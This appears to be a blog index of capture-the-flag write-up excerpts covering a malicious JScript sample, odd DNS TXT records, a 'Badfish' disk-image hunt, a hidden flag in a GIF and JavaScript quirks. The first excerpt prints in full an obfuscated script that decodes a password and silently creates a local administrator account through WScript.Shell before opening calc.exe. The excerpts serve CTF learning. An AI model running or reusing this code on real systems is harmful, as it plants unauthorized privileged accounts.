Adams Write-ups and References

Summary Steps type u2POGqu61l.js function a(b){var c="",d=b.split("\n");for(var e=0;e<d.length;e++){var f=d[e].replace(/^\s+|\s+$/g,'');if(f.indexOf("begin")===0||f.indexOf("end")===0||f==="")continue;var g=(f.charCodeAt(0)-32)&63;for(var h=1;h<f.length;h+=4){if(h+3>=f.length)break;var i=(f.charCodeAt(h)-32)&63,j=(f.charCodeAt(h+1)-32)&63,k=(f.charCodeAt(h+2)-32)&63,l=(f.charCodeAt(h+3)-32)&63;c+=String.fromCharCode((i<<2)|(j>>4));if(h+2<f.length-1)c+=String.fromCharCode(((j&15)<<4)|(k>>2));if(h+3<f.length-1)c+=String.fromCharCode(((k&3)<<6)|l)}}return c.substring(0,g)}var m="begin 644 -\nG9FQA9WLY.3(R9F(R,6%A9C$W-3=E,V9D8C(X9#<X.3!A-60Y,WT*\n`\nend";var n=a(m);var o=["net user LocalAdministrator "+n+" /add","net localgroup administrators LocalAdministrator /add","calc.exe"];var p=new ActiveXObject('WScript.Shell');for(var q=0;q<o.length-1;q++){p.Run(o[q],0,false)}p.Run(o[2],1,false); Using ChatGPT, I prompted it to beautify the code giving me a result of: function decode(input) { var result = ""; var lines = input.split("\n"); for (var i = 0; i < lines.length; i++) { var line = lines[i].replace(/^\s+|\s+$/g, ''); // Skip lines that start with "begin", "end" or are empty if (line.

Continue reading 

Summary Author: @JohnHammond Hmmm, have you seen some of the strange DNS records for the ctf.games domain? One of them sure is odd... Steps In the challenge description, the od was a hyperlink to https://en.wikipedia.org/wiki/Od_(Unix). My first assumption was that i’m going to have to use the OD utility to decode the text. I performed an nslookup against the TXT type and received this response: nslookup -type=txt ctf.games Server: 192.168.240.2 Address: 192.

Continue reading 

Summary Uh Oh it seems a few bad fish got into the fish tank! Can you find them all? Zip Password: bAdFi5h DISCLAIMER: Flag will start with the number of the challenge it belongs to. Badfish 002 I first started by mounting the img file. sudo mount -o loop,offset=$((2048 * 512)) badfish.img /mnt/bf Next, I started to enumerate the the files and discovered the second flag in /home/nemo/.bashrc. Badfish 003 Moving forward, I discovered the third flag ini the /usr/bin/ directory as a suspected binary called 3_5tr1nGs_r_BaD_4_f15H.

Continue reading 

Summary Hey check out this awesome gif I found! Steps The gif file has one image that contains a flag near the top right corner, but as you see its quite difficult to see without modification. I used the utility covert from ImageMagick to expand the gif into individual images. I used the following syntax to achieve this. convert chall.gif chall.png Now, I had multiple chall.png files for each frame of the gif.

Continue reading 

Summary We heard you like JavaScript? So we scrambled some nice JavaScript ☕ code for you to review! Review the provided code snippet and send appropriate API request to get the flag! JavaScript 001 Using the provided javascript I used the browsers console to help piece together the string. As we see in the screenshot, the value for "b" + "a" + +"a" + "a" is equals to baNaNa. This happens because the javascript is processing the space and reporting it as NaN (Not-a-Number).

Continue reading 